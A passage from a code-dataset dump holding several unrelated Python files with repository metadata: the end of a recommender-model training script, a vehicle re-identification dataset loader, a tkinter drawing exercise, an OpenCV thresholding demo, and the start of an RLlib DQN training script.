gametype_rate_dict)\nsample_weight_train = sample_weight[train_sample_index]\n\n# one_hist\n#同分布\nx_all = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list))\nx_all = np.array(x_all)\nx_train = x_all[train_sample_index].tolist()\nx_train = [list(i) for i in list(zip(*x_train))]\nx_eval = x_all[test_sample_index].tolist()\nx_eval = [list(i) for i in list(zip(*x_eval))]\ncc_train_sample = [x_train, label[train_sample_index]]\ncc_eval_sample = [x_eval, label[test_sample_index]]\n\n#尽量均衡\neval_bal_nums = 90000\n\n#data_all_1_with_hist = data_all_1[data_all_1['interest_gametype'] != '-1']\n#data_all_1_without_hist = data_all_1[data_all_1['interest_gametype'] == '-1']\n#diff_list = list(set(data_all_1['sn']).difference(set(data['sn']))) \n#in_list = list(set(sn_list))\n#in_index = [i for i in range(len(data_all_1)) if data_all_1['sn'].iloc[i] in in_list] \n#\n#temp_ratio = 1/len(gametype_rate_dict)\n#gametype_rate_dict_balance = {}\n#for i in gametype_rate_dict.keys():\n# gametype_rate_dict_balance[i] = [0.5, temp_ratio]\n# \n#data_in = data_build(data_all_1_with_hist, eval_bal_nums, gametype_rate_dict_balance)\n#del data_all_1, data_all_1_with_hist, data_all_1_without_hist\n\n_, hotrank_aid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_aid_cnt', base_dict=hotrank_aid_dict)\n_, hotrank_uid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_uid_cnt', base_dict=hotrank_uid_dict)\n_, _, _, gametype_label_list_in, _, _ = multi_column_info(data_in, 'gametype_label', 'gametype', maxlen=gametype_label_len, dict_base=gametype_label_dict)\n\n_, _, sn_dict_in, android_app_list_in,_, _ = multi_column_info(data_in, 'android_app', 'sn', maxlen=android_app_len, dict_base=android_app_dict, sep='::')\n_, _, _, ios_app_list_in, _, _ = multi_column_info(data_in, 'ios_app', 'sn', maxlen=ios_app_len, dict_base=ios_app_dict, sep='::')\n_, _, _, mobile_model_list_in, _, _ = multi_column_info(data_in, 'mobile_model', 'sn', maxlen=mobile_model_len, dict_base=mobile_model_dict, sep='::')\n_, _, _, interest_gametype_list_in, _, tr_list_in = multi_column_info(data_in, 'interest_gametype', 'sn', maxlen=interest_gametype_len, gametype_dict=gametype_dict, sep='::')\n\nsn_list_in = list(data_in['sn'].apply(lambda x:sn_dict[x] if x in sn_dict.keys() else 1).values)\ngametype_list_in = list(data_in['gametype'].apply(lambda x:gametype_dict[x] if x in gametype_dict.keys() else 1).values)\nhist_list_in = [interest_gametype_list_in[sn_dict_in[i]] for i in data_in['sn']]\nhist_last_sequence_list_in = [tr_list_in[0][sn_dict_in[i]] for i in data_in['sn']]\npos_in = [tr_list_in[1][sn_dict_in[i]] for i in data_in['sn']]\nneg_in = [tr_list_in[2][sn_dict_in[i]] for i in data_in['sn']]\n\nlabel_eval = np.array(list(data_in['label'].values))\nlabel_rand = np.zeros(len(label))\nlabel_eval_rand = np.zeros(len(label_eval))\n\n#length = interest_gametype_len*interest_gametype_len\n#auxiliary_index_ltr = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_i = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_ltr_in = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list_in))]).reshape((-1, length))\n#auxiliary_index_i_in = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list_in))]).reshape((-1, length))\n\n\nx_train = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list]\ncc_train_sample = [x_train, label, label_rand]\nx_eval = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in]\ncc_eval_sample = [x_eval, label_eval, label_eval_rand]\n\nx_train_tr = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, hist_last_sequence_list, pos, neg]\ncc_train_sample_tr = [x_train_tr, label, label_rand]\nx_eval_tr = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, hist_last_sequence_list_in, pos_in, neg_in]\ncc_eval_sample_tr = [x_eval_tr, label_eval, label_eval_rand]\n\n# multi_hist\n#同分布\nx_all_multi = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list))\nx_all_multi = np.array(x_all_multi)\nx_train_multi = x_all_multi[train_sample_index].tolist()\nx_train_multi = [list(i) for i in list(zip(*x_train_multi))]\nx_eval_multi = x_all_multi[test_sample_index].tolist()\nx_eval_multi = [list(i) for i in list(zip(*x_eval_multi))]\ncc_train_multi_sample = [x_train_multi, label[train_sample_index]]\ncc_eval_multi_sample = [x_eval_multi, label[test_sample_index]]\n\n#均衡\nx_train_multi = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list]\ncc_train_multi_sample = [x_train_multi, label]\n\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\n\nx_eval_multi = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, android_hist_list_in, ios_hist_list_in, mobile_hist_list_in]\ncc_eval_multi_sample = [x_eval_multi, label_eval]\n\n\n### model参数\n#简单规则:train的分布区预测test\ndef fun1(x):\n return sum(x==1)/len(x)\n\ndata_dict = {}\ntemp = data.groupby('gametype').agg({'label':fun1})\ntemp.columns = ['label_1_ratio']\nfor i in zip(temp.index, temp['label_1_ratio']):\n data_dict[i[0]] = i[1]\n\ny_pred = []\nfor i in data_in['gametype']:\n if i in data_dict.keys():\n y_pred.append(data_dict[i])\n else:\n y_pred.append(0)\n \nroc_auc_score(data_in['label'], y_pred) #0.5779539111727456\n#column_count_bar(data_in, 'gametype', t='test')\n#column_count_bar(data, 'gametype', t='train')\n'''\n###### 绘制对比效果图\n\ni = 0\nfor use_Activa in use_Activas:\n# draw_epoch(cc_DIN_One[i].auc_val, 'One'+use_Activa, batch_size, train_num, record_num, i)\n# draw_epoch(cc_DIN_Multi[i].auc_val, 'Multi'+use_Activa, batch_size, train_num, record_num, i)\n draw(cc_DIN_One[i].auc_val, cc_DIN_Multi[i].auc_val, train_num, batch_size, record_num, use_Activa, i+1) \n i += 1\n\ni = 0 \nOne_Dataframe = []\nMulti_Dataframe = []\nfor use_Activa in use_Activas:\n One_dict = {'epoch_1': cc_DIN_One[i].auc_val_item[0], 'epoch_2': cc_DIN_One[i].auc_val_item[1], 'epoch_3': cc_DIN_One[i].auc_val_item[2]}\n temp_One = pd.DataFrame(One_dict)\n temp_One.index = cc_DIN_One[i].item_val \n One_Dataframe.append(temp_One)\n \n Multi_dict = {'epoch_1': cc_DIN_Multi[i].auc_val_item[0], 'epoch_2': cc_DIN_Multi[i].auc_val_item[1], 'epoch_3': cc_DIN_Multi[i].auc_val_item[2]}\n temp_Multi = pd.DataFrame(Multi_dict)\n temp_Multi.index = cc_DIN_Multi[i].item_val \n Multi_Dataframe.append(temp_Multi)\n \n i += 1\n\n \n############ 数据过多,因此分块进行训练\n#block_size = 10\n#block_num = sample_nums // 10\n#cc_DIN_One_s = []\n#\n#for block in range(1, block_size+1):\n# cc_train_sample_temp = [[i[block_num*(block-1):block_num*block] for i in cc_train_sample[0]], cc_train_sample[1][block_num*(block-1):block_num*block]]\n#\n# if block == 1:\n# ccDIN_s = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n# android_app_num, ios_app_num, mobile_model_num, \n# android_app_list, ios_app_list, mobile_model_list,\n# gametype_label_num, gametype_label_list, use_Activa='Sigmoid')\n# \n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n# else:\n# ccDIN_res_s = ccDIN_s.train_model(cc_train_sample_temp, cc_eval_sample, batch_size, epoch, record_num)\n# cc_DIN_One_s.append(ccDIN_res_s)\n\n#val_all = []\n#for res in cc_DIN_One_s:\n# val_all.extend(res.auc_val )\n# \n#import matplotlib.pylab as plt\n#plt.plot(list(range(len(val_all))), val_all)\n#plt.show()\n'''\n\n#gdbt + LR\ndef generate_array(raw_list, l):\n \n res = [0] * (l+2)\n for i in raw_list:\n if i == 0:\n break\n res[i] = 1\n \n return res\n \nhotrank_aid_list_array = np.array(hotrank_aid_list, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array = np.array(hotrank_uid_list, dtype='int32').reshape(-1, 1)\ngt_array = np.array(gametype_list, dtype='int32').reshape(-1, 1)\ngtl_array = np.array([generate_array(gametype_label_list[i], gametype_label_num) for i in gametype_list], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array = np.array([generate_array(i, gametype_num) for i in hist_list], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_array = np.array([generate_array(i, android_app_num) for i in android_hist_list], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_array = np.array([generate_array(i, ios_app_num) for i in ios_hist_list], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_array = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_train = np.concatenate((hotrank_aid_list_array, hotrank_uid_list_array, gt_array, gtl_array, hist_array, android_hist_array, ios_hist_array, mobile_hist_array), axis=-1)\n\nhotrank_aid_list_array_eval = np.array(hotrank_aid_list_in, dtype='int32').reshape(-1, 1)\nhotrank_uid_list_array_eval = np.array(hotrank_uid_list_in, dtype='int32').reshape(-1, 1)\ngt_array_eval = np.array(gametype_list_in, dtype='int32').reshape(-1, 1)\ngtl_array_eval = np.array([generate_array(gametype_label_list_in[i], gametype_label_num) for i in gametype_list_in], dtype='int32').reshape(-1, gametype_label_num+2)\nhist_array_eval = np.array([generate_array(i, gametype_num) for i in hist_list_in], dtype='int32').reshape(-1, gametype_num+2)\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nandroid_hist_array_eval = np.array([generate_array(i, android_app_num) for i in android_hist_list_in], dtype='int32').reshape(-1, android_app_num+2)\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_array_eval = np.array([generate_array(i, ios_app_num) for i in ios_hist_list_in], dtype='int32').reshape(-1, ios_app_num+2)\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_array_eval = np.array([generate_array(i, mobile_model_num) for i in mobile_hist_list_in], dtype='int32').reshape(-1, mobile_model_num+2)\ngl_eval = np.concatenate((hotrank_aid_list_array_eval, hotrank_uid_list_array_eval, gt_array_eval, gtl_array_eval, hist_array_eval, android_hist_array_eval, ios_hist_array_eval, mobile_hist_array_eval), axis=-1)\n\nname = [str(i) for i in range(gl_train.shape[1])]\n\nlgb_train = lgb.Dataset(gl_train, label)\nlgb_eval = lgb.Dataset(gl_eval, label_eval, reference=lgb_train)\n\nparams = {\n 'task': 'train',\n 'boosting_type': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'num_leaves': 6,\n 'num_trees': 200,\n 'learning_rate': 0.01,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.8,\n 'bagging_freq': 5,\n 'verbose': 0\n}\n\n# number of leaves,will be used in feature transformation\nnum_leaf = 6\n\nprint('Start training...')\n# train\ngbm = lgb.train(params,\n lgb_train,\n num_boost_round=100,\n valid_sets=lgb_train,\n feature_name=name,\n categorical_feature=name)\n\n#print('Save model...')\n## save model to file\n#gbm.save_model('model.txt')\n\nprint('Start predicting...')\n# predict and get data on leaves, training data\ny_pred = gbm.predict(gl_train, pred_leaf=True)\n\nprint(np.array(y_pred).shape)\nprint(y_pred[:10])\n\nprint('Writing transformed training data')\ntransformed_training_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], \\\n dtype=np.int64) # N * num_tress * num_leafs\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_training_matrix[i][temp] += 1\n\n\ny_pred = gbm.predict(gl_eval, pred_leaf=True)\nprint('Writing transformed testing data')\ntransformed_testing_matrix = np.zeros([len(y_pred), len(y_pred[0]) * num_leaf], dtype=np.int64)\nfor i in range(0, len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf + np.array(y_pred[i])\n transformed_testing_matrix[i][temp] += 1\n\n\nlm = LogisticRegression(penalty='l2', C=0.05) # logestic model construction\nlm.fit(transformed_training_matrix, label) # fitting the data\ny_pred_test = lm.predict_proba(transformed_testing_matrix) # Give the probabilty on each label\n\neval_auc = roc_auc_score(label_eval, y_pred_test)\nprint(eval_auc)\n\ntemp, batch_size, epoch, record_num, save_path = [], 64, 3, 1000, 'D:\\\\my\\\\netease_data\\\\model'\nos.chdir(save_path)\n\nccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccbase.model.save('base_model.h5')\n\nccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccbase_tr.model.save('basetr_model.h5')\n\nccdin = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdin_res = ccdin.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdin.model.save('din_model.h5')\n\nccdin_tr = ccDINModelwithOneHist(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdin_tr_res = ccdin_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdin_tr.model.save('dintr_model.h5')\n\nccpnn = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccpnn_res = ccpnn.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccpnn.model.save('pnn_model.h5')\n\nccpnn_tr = ccPNN(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len, weighted=True, use_Transformer=True, w=1e-12)\nccpnn_tr_res = ccpnn_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccpnn_tr.model.save('pnntr_model.h5')\n\nccdeepfm = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\nccdeepfm_res = ccdeepfm.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\nccdeepfm.model.save('deepfm_model.h5')\n\nccdeepfm_tr = ccdeepFM(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\nccdeepfm_tr_res = ccdeepfm_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\nccdeepfm_tr.model.save('deepfmtr_model.h5')\n\nstart, end, model = 1, 6, 'base'\nfor i in range(start, end):\n print('#'*50)\n print(i)\n print('#'*50)\n\n K.clear_session()\n ccbase = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len)\n ccbase_res = ccbase.train_model(cc_train_sample, cc_eval_sample, batch_size, epoch, record_num)\n# np.savetxt(model + '_auc_' + str(i) + '.txt', ccbase_res.auc_val)\n \n K.clear_session()\n ccbase_tr = ccBaseModel(sn_num, gametype_num, hotrank_aid_num, hotrank_uid_num, interest_gametype_len, \n android_app_num, ios_app_num, mobile_model_num, \n android_app_list, ios_app_list, mobile_model_list,\n gametype_label_num, gametype_label_list, user_multi_cate_len_1=android_app_len, user_multi_cate_len_2=ios_app_len, \n user_multi_cate_len_3=mobile_model_len, item_multi_cate_len=gametype_label_len,\n weighted=True, use_Transformer=True)\n ccbase_tr_res = ccbase_tr.train_model(cc_train_sample_tr, cc_eval_sample_tr, batch_size, epoch, record_num)\n# np.savetxt(model + 'tr_auc_' + str(i) + '.txt', ccbase_tr_res.auc_val)\n\n\ndraw(temp, train_num, batch_size, record_num, 'ReLU', 1, ['deepfm', 'base', 'base_tr', 'din', 'din_tr', 'pnn']) \n\n\ntemp1_mean, temp2_mean = 0, 0\nfor i in range(start, end):\n temp1 = np.loadtxt(model + '_auc_' + str(i) + '.txt')\n temp2 = np.loadtxt(model + 'tr_auc_' + str(i) + '.txt')\n temp1_mean = temp1_mean + temp1\n temp2_mean = temp2_mean + temp2\n\ntemp1_mean = temp1_mean / (end - start)\ntemp2_mean = temp2_mean / (end - start)\n\nx_index = (np.arange(len(temp1_mean))+1) / (train_num // batch_size // record_num)\nplt.plot(x_index, temp1_mean, label=model)\nplt.plot(x_index, temp2_mean, label=model+'_tr')\nplt.xlabel('epochs')\nplt.ylabel('auc')\nplt.legend()\nplt.title('The training process')\n\n\n\n\n\n","repo_name":"AcerLai/MyRS","sub_path":"lhj-master/深度推荐模型:din模型/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":29076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8782963574","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: sherlock\r\n@contact: sherlockliao01@gmail.com\r\n\"\"\"\r\n\r\nimport glob\r\nimport re\r\nimport pdb\r\nimport os\r\nimport os.path as osp\r\nimport numpy as np\r\nfrom .bases import BaseImageDataset\r\n\r\n\r\nclass VERI_MM(BaseImageDataset):\r\n \"\"\"\r\n Market1501\r\n Reference:\r\n Zheng et al. Scalable Person Re-identification: A Benchmark. ICCV 2015.\r\n URL: http://www.liangzheng.org/Project/project_reid.html\r\n\r\n Dataset statistics:\r\n # identities: 1501 (+1 for background)\r\n # images: 12936 (train) + 3368 (query) + 15913 (gallery)\r\n \"\"\"\r\n dataset_dir = 'image_gan'\r\n\r\n def __init__(self, root='/home/haoluo/data', verbose=True, **kwargs):\r\n super(VERI_MM, self).__init__()\r\n root = r\"F:\\datasets\\VeRi776_multimodal\"\r\n self.dataset_dir = osp.join(root, self.dataset_dir)\r\n self.train_dir = osp.join(self.dataset_dir, 'image_train')\r\n self.query_dir = osp.join(self.dataset_dir, 'image_query')\r\n self.gallery_dir = osp.join(self.dataset_dir, 'image_test')\r\n\r\n self._check_before_run()\r\n\r\n train = self._process_dir(self.train_dir, relabel=True)\r\n query = self._process_dir(self.query_dir, relabel=False)\r\n gallery = self._process_dir(self.gallery_dir, relabel=False)\r\n #pdb.set_trace()\r\n if verbose:\r\n print(\"=> RGB_IR loaded\")\r\n self.print_dataset_statistics(train, query, gallery)\r\n\r\n self.train = train\r\n self.query = query\r\n self.gallery = gallery\r\n\r\n self.num_train_pids, self.num_train_imgs, self.num_train_cams = self.get_imagedata_info(self.train)\r\n self.num_query_pids, self.num_query_imgs, self.num_query_cams = self.get_imagedata_info(self.query)\r\n self.num_gallery_pids, self.num_gallery_imgs, self.num_gallery_cams = self.get_imagedata_info(self.gallery)\r\n\r\n print(\"veri776 multimodal version used as dataset! => {}\".format(self.dataset_dir))\r\n #pdb.set_trace()\r\n\r\n def _check_before_run(self):\r\n \"\"\"Check if all files are available before going deeper\"\"\"\r\n if not osp.exists(self.dataset_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.dataset_dir))\r\n if not osp.exists(self.train_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.train_dir))\r\n if not osp.exists(self.query_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.query_dir))\r\n if not osp.exists(self.gallery_dir):\r\n raise RuntimeError(\"'{}' is not available\".format(self.gallery_dir))\r\n\r\n def _process_dir(self, dir_path, relabel=False):\r\n imgs = glob.glob(osp.join(dir_path, '*.jpg'))\r\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\r\n\r\n pid_container = set()\r\n for img in imgs:\r\n pid, _ = map(int, pattern.search(img).groups())\r\n if pid == -1: continue # junk images are just ignored\r\n pid_container.add(pid)\r\n pid2label = {pid: label for label, pid in enumerate(pid_container)}\r\n\r\n dataset = []\r\n for img in imgs:\r\n pid, camid = map(int, pattern.search(img).groups())\r\n #pdb.set_trace()\r\n #if pid == -1: continue # junk images are just ignored\r\n assert 1 <= pid <= 776 # pid == 0 means background\r\n assert 1 <= camid <= 20\r\n camid -= 1 # index starts from 0\r\n if relabel: pid = pid2label[pid]\r\n\r\n r_path = osp.join(dir_path, img)\r\n n_path = osp.join(dir_path+\"_n\", img)\r\n t_path = osp.join(dir_path+\"_t\", img)\r\n\r\n dataset.append(((r_path, n_path, t_path), pid, 0, camid))\r\n return dataset\r\n\r\n","repo_name":"superlollipop123/Cross-directional-Center-Network-and-MSVR310","sub_path":"data/datasets/veri_mm.py","file_name":"veri_mm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"27028892129","text":"from tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a square drawing function that takes 2 parameters:\n# the square size, and the fill color,\n# and draws a square of that size and color to the center of the canvas.\n# create a loop that fills the canvas with rainbow colored squares.\n\nsquare_1 = 20\nsquare_1_color = 'green'\n\nsquare_2 = 50\nsquare_2_color = 'purple'\n\nsquare_3 = 100\nsquare_3_color = 'blue'\n\ndef center_square(x,y):\n square = canvas.create_rectangle (150 - (x/2), 150 - (x/2), 150 + (x/2), 150 + (x/2), fill=y)\n\ncenter_square(square_3, square_3_color)\ncenter_square(square_2, square_2_color)\ncenter_square(square_1, square_1_color)\n\nroot.mainloop()\n","repo_name":"green-fox-academy/AHolcsik","sub_path":"Week03/Day3/rainbow_box_function.py","file_name":"rainbow_box_function.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15132377800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:09:48 2017\n\n@author: zhangzhexi\n\"\"\"\n\nimport cv2\n\ndef main():\n image = cv2.imread(\"Test_images/Lenna.png\",1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Input Image',gray)\n cv2.imwrite('Input_image.jpg',gray)\n \n threshold_value = 128\n dst,thresh = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_TRUNC)\n cv2.imshow(\"Threshold Image\", thresh)\n cv2.imwrite(\"Threshold_image.jpg\",thresh)\n\n# Binary Threshold\n dst,thresh_binary = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_BINARY)\n cv2.imshow(\"Binary threshold\", thresh_binary)\n cv2.imwrite(\"Threshold_binary.jpg\", thresh_binary)\n\n# Band Thresholding\n threshold1 = 27\n threshold2 = 125\n dst,binary_image_1 = cv2.threshold(gray, threshold1, 255, cv2.THRESH_BINARY)\n dst,binary_image_2 = cv2.threshold(gray, threshold2, 255, cv2.THRESH_BINARY_INV)\n band_thresholded_image = cv2.bitwise_and(binary_image_1,binary_image_2)\n cv2.imshow(\"Band Thresholding\", band_thresholded_image)\n cv2.imwrite(\"Band_Thresholding.jpg\", band_thresholded_image)\n\n# Semi Thresholding\n current_threshold = 128\n max_threshold = 255;\n dst,semi_thresholded_image = cv2.threshold(gray,current_threshold,max_threshold,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)\n semi_thresholded_image = cv2.bitwise_and(gray,semi_thresholded_image)\n cv2.imshow(\"Semi Thresholding\",semi_thresholded_image)\n cv2.imwrite(\"Semi_Thresholding.jpg\",semi_thresholded_image)\n\n# Adaptive Thresholding\n adaptive_thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,101,10)\n cv2.imshow(\"Adaptive Thresholding\", adaptive_thresh)\n cv2.imwrite(\"Adaptive_Thresholding.jpg\", adaptive_thresh)\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzx0921/EC601_OpenCV","sub_path":"Exercise4/Threshold.py","file_name":"Threshold.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34741969477","text":"import pyvirtualdisplay\r\n_display = pyvirtualdisplay.Display(visible=False, size=(1400, 900))\r\n_ = _display.start()\r\nimport gym\r\nfrom gym.utils.play import play\r\nenv = gym.make(\"CartPole-v0\")\r\nplay(env, zoom=4)\r\nimport ray\r\nfrom ray import tune\r\nfrom ray.rllib.agents.dqn import DQNTrainer\r\n\r\nray.shutdown()\r\nray.init(\r\n include_webui=False,\r\n ignore_reinit_error=True,\r\n object_store_memory=8 * 1024 * 1024 * 1024 # 8GB limit … feel free to increase this if you can\r\n)\r\n\r\nENV = 'Humanoid-v1'\r\nTARGET_REWARD = 195\r\nTRAINER = DQNTrainer\r\n\r\ntune.run(\r\n TRAINER,\r\n stop={\"episode_reward_mean\": TARGET_REWARD}, # stop as soon as we \"solve\" the environment\r\n config={\r\n \"env\": ENV,\r\n \"num_workers\": 0, # run in a single process\r\n \"num_gpus\": 0,\r\n \"monitor\": True, # store stats and videos periodically\r\n \"evaluation_num_episodes\": 25, # every 25 episodes instead of the default 10\r\n }\r\n)\r\nfrom base64 import b64encode\r\nfrom pathlib import Path\r\nfrom typing import List\r\n\r\n# this will depend on which provider you are using; the correct version is\r\n# probably what you get if you append /ray/results/ to the output from !pwd\r\nOUT_PATH = Path('/root/ray_results/')\r\n\r\ndef latest_experiment() -> Path:\r\n \"\"\" Get the path of the results directory of the most recent training run. \"\"\"\r\n experiment_dirs = []\r\n for algorithm in OUT_PATH.iterdir():\r\n if not algorithm.is_dir():\r\n continue\r\n for experiment in algorithm.iterdir():\r\n if not experiment.is_dir():\r\n continue\r\n experiment_dirs.append((experiment.stat().st_mtime, experiment))\r\n return max(experiment_dirs)[1]\r\n\r\ndef latest_videos() -> List[Path]:\r\n # because the ISO timestamp is in the name, the last alphabetically is the latest\r\n return list(sorted(latest_experiment().glob('*.mp4')))\r\n\r\ndef render_mp4(videopath: Path) -> str:\r\n mp4 = open(videopath, 'rb').read()\r\n base64_encoded_mp4 = b64encode(mp4).decode()\r\n return f'

    {videopath.name}

